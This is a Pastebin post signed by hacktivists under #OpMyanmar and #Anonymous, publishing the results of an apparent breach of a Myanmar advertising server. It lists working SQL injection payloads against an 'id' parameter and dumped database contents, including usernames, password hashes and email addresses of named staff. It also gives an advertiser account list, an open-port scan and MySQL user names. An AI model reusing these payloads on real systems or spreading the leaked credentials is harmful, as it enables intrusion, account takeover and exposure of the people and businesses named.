pr1sox

Sin1peCrew - #OpMyanmar

Mar 9th, 2021 (edited)
1,018
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.16 KB | None | 0 0
  1. - By:  pr1sox | gennes1r | k3rbero -
  2.  
  3.  
  4.   /$$$$$$  /$$             /$$                        /$$$$$$                                  
  5.  /$$__  $$|__/           /$$$$                       /$$__  $$                                  
  6. | $$  \__/ /$$ /$$$$$$$ |_  $$    /$$$$$$   /$$$$$$ | $$  \__/  /$$$$$$   /$$$$$$  /$$  /$$  /$$
  7. |  $$$$$$ | $$| $$__  $$  | $$   /$$__  $$ /$$__  $$| $$       /$$__  $$ /$$__  $$| $$ | $$ | $$
  8.  \____  $$| $$| $$  \ $$  | $$  | $$  \ $$| $$$$$$$$| $$      | $$  \__/| $$$$$$$$| $$ | $$ | $$
  9.  /$$  \ $$| $$| $$  | $$  | $$  | $$  | $$| $$_____/| $$    $$| $$      | $$_____/| $$ | $$ | $$
  10. |  $$$$$$/| $$| $$  | $$ /$$$$$$| $$$$$$$/|  $$$$$$$|  $$$$$$/| $$      |  $$$$$$$|  $$$$$/$$$$/
  11.  \______/ |__/|__/  |__/|______/| $$____/  \_______/ \______/ |__/       \_______/ \_____/\___/
  12.                                 | $$                                                            
  13.                                 | $$          #OpMyanmar - #Sin1peCrew - #Anonymous                                                  
  14.                                |__/  
  15.                                                                              
  16.  
  17.      DATABASE & SQLi INFO:
  18.      
  19.     Parameter: id (GET)
  20.     Type: boolean-based blind
  21.     Title: AND boolean-based blind - WHERE or HAVING clause
  22.     Payload: id=12 AND 2386=2386
  23.  
  24.     Type: time-based blind
  25.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  26.     Payload: id=12 AND (SELECT 4845 FROM (SELECT(SLEEP(5)))xbtg)
  27.  
  28.     Type: UNION query
  29.     Title: Generic UNION query (NULL) - 3 columns
  30.  
  31.  
  32.  
  33.   DATABASE:
  34.  
  35. available databases [7]:
  36.  
  37. [*] adserver
  38. [*] adserver_new
  39. [*] information_schema
  40. [*] mediamall
  41. [*] mysql
  42. [*] performance_schema
  43. [*] sys
  44.  
  45.  
  46. Database: adserver
  47. Table: rv_users
  48. [4 entries]
  49. +-----------------+----------------------------------+--------------------------------+---------+
  50. | username        | password                         | email_address                  | user_id |
  51. +-----------------+----------------------------------+--------------------------------+---------+
  52. | marrynetwork    | 98a13ee97be67eb2d6a6e80bfe07d712 | vietanh@ringier.com.vn         | 1       |
  53. | mimitheint      | b2364a6c0ebb0e28e42cef3de2f96a3a | mimitheint@ringier.com.vn      | 2       |
  54. | htetwaihlanhtun | a81a7ee92934d90de9d2bb9e1af28641 | htetwaihlanhtun@ringier.com.vn | 3       |
  55. | phyutharsoe     | ef6d1af9987749ed0cd98e4379bedcda | phyutharsoe@ringier.com.vn     | 4       |
  56. +-----------------+----------------------------------+--------------------------------+---------+
  57.  
  58.  
  59.  
  60. Database: adserver
  61. [58 tables]
  62. +-----------------------------------------+
  63. | banner_vast_element_seq                 |
  64. | rv_account_preference_assoc             |
  65. | rv_account_user_assoc                   |
  66. | rv_account_user_permission_assoc        |
  67. | rv_accounts                             |
  68. | rv_acls                                 |
  69. | rv_acls_channel                         |
  70. | rv_ad_category_assoc                    |
  71. | rv_ad_zone_assoc                        |
  72. | rv_affiliates                           |
  73. | rv_affiliates_extra                     |
  74. | rv_agency                               |
  75. | rv_application_variable                 |
  76. | rv_audit                                |
  77. | rv_banner_vast_element                  |
  78. | rv_banners                              |
  79. | rv_campaigns                            |
  80. | rv_campaigns_trackers                   |
  81. | rv_category                             |
  82. | rv_channel                              |
  83. | rv_clients                              |
  84. | rv_data_bkt_a                           |
  85. | rv_data_bkt_a_var                       |
  86. | rv_data_bkt_c                           |
  87. | rv_data_bkt_m                           |
  88. | rv_data_bkt_r                           |
  89. | rv_data_bkt_vast_e                      |
  90. | rv_data_intermediate_ad                 |
  91. | rv_data_intermediate_ad_connection      |
  92. | rv_data_intermediate_ad_variable_value  |
  93. | rv_data_raw_ad_click                    |
  94. | rv_data_raw_ad_impression               |
  95. | rv_data_raw_ad_request                  |
  96. | rv_data_raw_tracker_impression          |
  97. | rv_data_raw_tracker_variable_value      |
  98. | rv_data_summary_ad_hourly               |
  99. | rv_data_summary_ad_zone_assoc           |
  100. | rv_data_summary_channel_daily           |
  101. | rv_data_summary_zone_impression_history |
  102. | rv_database_action                      |
  103. | rv_images                               |
  104. | rv_log_maintenance_forecasting          |
  105. | rv_log_maintenance_priority             |
  106. | rv_log_maintenance_statistics           |
  107. | rv_password_recovery                    |
  108. | rv_placement_zone_assoc                 |
  109. | rv_preferences                          |
  110. | rv_session                              |
  111. | rv_stats_vast                           |
  112. | rv_targetstats                          |
  113. | rv_tracker_append                       |
  114. | rv_trackers                             |
  115. | rv_upgrade_action                       |
  116. | rv_userlog                              |
  117. | rv_users                                |
  118. | rv_variable_publisher                   |
  119. | rv_variables                            |
  120. | rv_zones                                |
  121. +-----------------------------------------+
  122.  
  123.  
  124.  
  125. Database: adserver
  126. Table: rv_accounts
  127. [3 columns]
  128. +--------------+--------------+
  129. | Column       | Type         |
  130. +--------------+--------------+
  131. | account_id   | mediumint(9) |
  132. | account_name | varchar(255) |
  133. | account_type | varchar(16)  |
  134. +--------------+--------------+
  135.  
  136.  
  137. Database: adserver
  138. Table: rv_accounts
  139. [44 entries]
  140. +------------+-------------------------------------+--------------+
  141. | account_id | account_name                        | account_type |
  142. +------------+-------------------------------------+--------------+
  143. | 1          | Administrator account               | ADMIN        |
  144. | 2          | Default manager                     | MANAGER      |
  145. | 3          | www.marry.com.mm                    | TRAFFICKER   |
  146. | 4          | www.kalay.com.mm                    | TRAFFICKER   |
  147. | 8          | Dutch Lady                          | ADVERTISER   |
  148. | 9          | Farlin                              | ADVERTISER   |
  149. | 10         | Mamy Poko                           | ADVERTISER   |
  150. | 11         | Similac                             | ADVERTISER   |
  151. | 12         | Grand Hantha International Hospital | ADVERTISER   |
  152. | 13         | Pun Hlaing Siloam Hospital          | ADVERTISER   |
  153. | 15         | Y Photo Studio                      | ADVERTISER   |
  154. | 16         | Eternal Gems                        | ADVERTISER   |
  155. | 17         | Novotel Yangon Max                  | ADVERTISER   |
  156. | 18         | Hello                               | ADVERTISER   |
  157. | 19         | MK Photography                      | ADVERTISER   |
  158. | 20         | Bo Bo                               | ADVERTISER   |
  159. | 22         | Obimin                              | ADVERTISER   |
  160. | 23         | Wedding Day                         | ADVERTISER   |
  161. | 25         | Forever Gems                        | ADVERTISER   |
  162. | 26         | Perfectil                           | ADVERTISER   |
  163. | 27         | Melia Yangon                        | ADVERTISER   |
  164. | 28         | Chilli                              | ADVERTISER   |
  165. | 29         | His & Hers                          | ADVERTISER   |
  166. | 31         | Forever Wedding Studio              | ADVERTISER   |
  167. | 32         | Biogesic                            | ADVERTISER   |
  168. | 33         | White Gallery                       | ADVERTISER   |
  169. | 34         | Dr.K                                | ADVERTISER   |
  170. | 35         | City Baby Clud                      | ADVERTISER   |
  171. | 36         | Ceelin                              | ADVERTISER   |
  172. | 37         | LadyM                               | ADVERTISER   |
  173. | 38         | Pedisure                            | ADVERTISER   |
  174. | 39         | Lactogrow                           | ADVERTISER   |
  175. | 40         | Cerelac                             | ADVERTISER   |
  176. | 41         | Fish Oil                            | ADVERTISER   |
  177. | 42         | PSI                                 | ADVERTISER   |
  178. | 43         | Jordan                              | ADVERTISER   |
  179. | 44         | Marry Campaign                      | ADVERTISER   |
  180. | 45         | Mom & Kalay Fair                    | ADVERTISER   |
  181. | 46         | NAN Optipro3 Myanmar                | ADVERTISER   |
  182. | 48         | Catalogue                           | ADVERTISER   |
  183. | 49         | Kalay Campaign                      | ADVERTISER   |
  184. | 50         | Dumex                               | ADVERTISER   |
  185. | 51         | Kingsman                            | ADVERTISER   |
  186. | 52         | Dress Gallery                       | ADVERTISER   |
  187. +------------+-------------------------------------+--------------+
  188.  
  189. Database: adserver
  190. Table: rv_users
  191. [13 columns]
  192. +--------------------+--------------+
  193. | Column             | Type         |
  194. +--------------------+--------------+
  195. | comments           | text         |
  196. | language           | varchar(5)   |
  197. | password           | varchar(64)  |
  198. | active             | tinyint(1)   |
  199. | contact_name       | varchar(255) |
  200. | date_created       | datetime     |
  201. | date_last_login    | datetime     |
  202. | default_account_id | mediumint(9) |
  203. | email_address      | varchar(64)  |
  204. | email_updated      | datetime     |
  205. | sso_user_id        | int(11)      |
  206. | user_id            | mediumint(9) |
  207. | username           | varchar(64)  |
  208. +--------------------+--------------+
  209.  
  210.  
  211.  
  212.  
  213.  
  214.  #### MORE INFO: ###
  215.  
  216.  
  217.  
  218. PORT      STATE    SERVICE         VERSION
  219. 22/tcp    open     ssh             OpenSSH 6.6.1 (protocol 2.0)
  220. 25/tcp    filtered smtp
  221. 80/tcp    open     http            nginx
  222. 139/tcp   filtered netbios-ssn
  223. 443/tcp   open     ssl/http        nginx
  224. 445/tcp   filtered microsoft-ds
  225. 3306/tcp  filtered mysql
  226. 5432/tcp  filtered postgresql
  227. 9200/tcp  filtered wap-wsp
  228. 32779/tcp filtered sometimes-rpc21
  229.  
  230.  
  231. MySQL users: ringier | mysq.sys | ringier | root
  232. MySQL Versión ; 5.0.12 (Percona fork)
  233.  
  234.  
  235. Server: NGNIX
  236.  
  237. contact@mediamall.com.mm
  238. admin@mediamall.com.mm
  239. mail.google.com/mail/?view=cm&fs=1&to=contact@mediamall.com.mm
  240.  
  241.  
Add Comment
Please, Sign In to add comment